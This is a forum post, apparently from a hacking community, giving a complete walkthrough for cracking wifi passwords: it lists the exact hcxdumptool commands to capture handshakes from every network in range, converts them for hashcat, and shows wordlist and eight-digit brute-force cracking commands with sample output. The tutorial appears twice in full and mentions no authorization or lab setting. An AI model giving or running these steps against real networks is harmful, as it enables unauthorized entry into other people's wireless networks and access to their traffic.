Bash
Event-Driven Designer
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
I saw a post yesterday about hacking wifi networks using airmon-ng. I still use airmon sometimes, but if we use hcxdumptool instead then we don't need to mess around with deauths/active clients and such.
Hcxdumptool is a packet capture tool that is going to grab all you need from every wifi network in range with very little user input, it comes preinstalled on some Linux systems otherwise you can get it from git (https://github.com/ZerBea/hcxdumptool).
First install the tool if you don't already have it:
git clone
cd hcxdumptool
Install some dependencies and compile:
sudo apt-get install pkg-config libcurl4-openssl-dev libssl-dev zlib1g-dev
make
sudo make install
Let's use the tool, in a similar fashion to airmon-ng your wifi adapter will need to be in monitor mode, hcx does this for you automatically but you still need to bring your services down (like airmon-ng's "check kill":
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
Run (where wlan0 is your wifi adapter, you can check this with 'sudo iwconfig'):
sudo hcxdumptool -i wlan0 -o dump.pcapng --active_beacon --enable_status=1
Let the tool run for at least a few minutes, hours if you like, it will continue capturing until you ctrl+c to quit, you're going to see lots of info like this:
09:07:43 1 553ad66cea23 d474607eace6 TP-MSG4 [EAPOL:M1M2ROGUE EAPOLTIME:1428 RC:64844 KDV:2]
Above our tool has found an Access Point "TP-MSG4", mac address "d4:74:60:7e:ac:e6", which is the one we want in this demo. Let's convert the dump file to crack in hashcat:
hcxpcapngtool -o hash.hc22000 -E essidlist dump.pcapng
We now have a hash file, open it up in your favorite text editor and you will see a row of AP captures:
WPA*02*36ee008s471e593cfab67fde83a848b0*000effbfaf61*535cd63cea23*42542.......
WPA*02*bd93afd121f253063fdc496d6f425c94*0c8d323cd459*18s7s75e933e*42542......
WPA*02*c1740829541159a3042761165737666f*d474607eace6*543ad52csa24*42542....
You can see the last row has our AP, mac d474607eace6, delete the other lines from the file and save it, your hash is now ready to be cracked.
Example:
hashcat -m 22000 hash.hc22000 wordlist.txt [you're telling hashcat it's a WPA attack (22000), the file to crack and your wordlist]
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d [here we are choosing "attack mode 3" which is bruteforce, and specifying to try a combination of 8 digits]
And there you have it, hashcat will run your attack and try and crack the password, you can specify rules to follow (?l is lowercase letter instead of ?d digit for example, or you can use --increment to specify a min/max password length etc). I heavily recommend reading hashcat's excellent wiki (https://hashcat.net/wiki/doku.php?id=hashcat) to learn more about different attacks and built-in rulesets.
Hcxdumptool is a packet capture tool that is going to grab all you need from every wifi network in range with very little user input, it comes preinstalled on some Linux systems otherwise you can get it from git (https://github.com/ZerBea/hcxdumptool).
First install the tool if you don't already have it:
git clone
You must upgrade your account or reply in the thread to view hidden text.
Install some dependencies and compile:
sudo apt-get install pkg-config libcurl4-openssl-dev libssl-dev zlib1g-dev
make
sudo make install
Let's use the tool, in a similar fashion to airmon-ng your wifi adapter will need to be in monitor mode, hcx does this for you automatically but you still need to bring your services down (like airmon-ng's "check kill":
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
Run (where wlan0 is your wifi adapter, you can check this with 'sudo iwconfig'):
sudo hcxdumptool -i wlan0 -o dump.pcapng --active_beacon --enable_status=1
Let the tool run for at least a few minutes, hours if you like, it will continue capturing until you ctrl+c to quit, you're going to see lots of info like this:
09:07:43 1 553ad66cea23 d474607eace6 TP-MSG4 [EAPOL:M1M2ROGUE EAPOLTIME:1428 RC:64844 KDV:2]
Above our tool has found an Access Point "TP-MSG4", mac address "d4:74:60:7e:ac:e6", which is the one we want in this demo. Let's convert the dump file to crack in hashcat:
hcxpcapngtool -o hash.hc22000 -E essidlist dump.pcapng
We now have a hash file, open it up in your favorite text editor and you will see a row of AP captures:
WPA*02*36ee008s471e593cfab67fde83a848b0*000effbfaf61*535cd63cea23*42542.......
WPA*02*bd93afd121f253063fdc496d6f425c94*0c8d323cd459*18s7s75e933e*42542......
WPA*02*c1740829541159a3042761165737666f*d474607eace6*543ad52csa24*42542....
You can see the last row has our AP, mac d474607eace6, delete the other lines from the file and save it, your hash is now ready to be cracked.
Example:
hashcat -m 22000 hash.hc22000 wordlist.txt [you're telling hashcat it's a WPA attack (22000), the file to crack and your wordlist]
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d [here we are choosing "attack mode 3" which is bruteforce, and specifying to try a combination of 8 digits]
And there you have it, hashcat will run your attack and try and crack the password, you can specify rules to follow (?l is lowercase letter instead of ?d digit for example, or you can use --increment to specify a min/max password length etc). I heavily recommend reading hashcat's excellent wiki (https://hashcat.net/wiki/doku.php?id=hashcat) to learn more about different attacks and built-in rulesets.